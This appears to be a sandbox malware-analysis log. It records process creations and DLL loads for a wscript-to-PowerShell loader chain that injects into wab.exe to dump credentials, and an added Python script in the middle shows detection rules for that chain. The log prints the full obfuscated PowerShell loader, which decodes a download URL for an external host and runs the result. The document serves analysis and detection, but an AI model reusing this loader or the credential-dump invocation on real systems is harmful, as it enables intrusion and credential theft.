                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. 
Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. 
Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sremlJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\humjlxyi"
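The process creations above form the chain wscript.exe -> powershell.exe (System32) -> powershell.exe (SysWOW64) -> cmd.exe and wab.exe -> wab.exe /stext <temp file>. The script below is an added example, not part of the Joe Sandbox report and not any vendor's detection content: it runs a handful of rules over Sysmon-style process-creation records and returns the hits. The event records are constructed to mirror the tree above (the pids, the wscript.exe command line and the padded PowerShell command line are made up), and the rule names, the 2000-character "very long command line" threshold and the set of expected wab.exe parents are this example's own choices. One benign explorer.exe -> wab.exe launch is included to show that it does not fire.

```python
"""Process-chain rules for the execution tree above. Added example, not part of the
Joe Sandbox report; the events and thresholds are constructed for illustration."""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path, as carried in Sysmon Event ID 1 / EDR process telemetry
    cmdline: str


LONG_CMDLINE = 2000                      # assumption: above this a command line is "very long"
WAB_EXPECTED_PARENTS = {"explorer.exe"}  # assumption: where a legitimate wab.exe launch comes from


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _is_wow64(path: str) -> bool:
    return "\\syswow64\\" in path.lower()


def check_chain(events):
    """Return sorted (rule, pid) findings for a list of ProcEvent records."""
    by_pid = {e.pid: e for e in events}
    findings = set()
    for e in events:
        name = _name(e.image)
        parent = by_pid.get(e.ppid)
        pname = _name(parent.image) if parent else ""
        # The .vbs stage: a script host dropping into PowerShell.
        if name == "powershell.exe" and pname in ("wscript.exe", "cscript.exe"):
            findings.add(("script_host_spawns_powershell", e.pid))
        # 64-bit PowerShell relaunching itself from SysWOW64: the 32-bit hop the loader
        # needs for its shellcode, and not something a user or an admin script does.
        if (name == "powershell.exe" and pname == "powershell.exe"
                and _is_wow64(e.image) and not _is_wow64(parent.image)):
            findings.add(("powershell_x64_to_wow64", e.pid))
        # Windows Contacts (wab.exe) started by anything but the shell, including by wab.exe itself.
        if name == "wab.exe" and pname not in WAB_EXPECTED_PARENTS:
            findings.add(("wab_unusual_parent", e.pid))
        # "/stext <file>" is the NirSoft "save as text" switch; wab.exe never takes it, so a
        # wab.exe running with it is injected recovery-tool code writing a credential dump.
        if name == "wab.exe" and "/stext" in e.cmdline.lower():
            findings.add(("wab_stext_credential_dump", e.pid))
        if len(e.cmdline) > LONG_CMDLINE:
            findings.add(("very_long_cmdline", e.pid))
    return sorted(findings)


# Constructed padding standing in for the multi-kilobyte obfuscated command line above.
_LONG_PS = ("powershell.exe \"cls;write '" + "Recovers Rowth Afhaengighedsforhold " * 80
            + "';If (${host}.CurrentCulture) {$kbspriserne++;} ...\"")

# Constructed events mirroring the report's process tree (pids and the .vbs path are made up).
SAMPLE_EVENTS = [
    ProcEvent(500, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1000, 500, r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Users\user\Desktop\lure.vbs"'),
    ProcEvent(2000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", _LONG_PS),
    ProcEvent(3000, 2000, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", _LONG_PS),
    ProcEvent(4000, 3000, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"'),
    ProcEvent(5000, 3000, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(5001, 5000, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ugtgkmvnmbilkeinjrrnqjhzionvtufj"'),
    ProcEvent(5002, 5000, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xahrl"'),
    # Benign: an interactive launch from the shell, which no rule should flag.
    ProcEvent(6000, 500, r"C:\Program Files (x86)\Windows Mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
]

if __name__ == "__main__":
    for rule, pid in check_chain(SAMPLE_EVENTS):
        print(f"{rule:32s} pid={pid}")
```

The parent check and the /stext check are deliberately separate: the first wab.exe (pid 5000) is flagged only for its PowerShell parent, while its children are flagged for both, which is the distinction between the injected host process and the recovery-tool code it spawns to write dumps into %TEMP%.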
                Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winmm.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rstrtmgr.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: version.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: pstorec.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: vaultcli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wintypes.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: pstorec.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
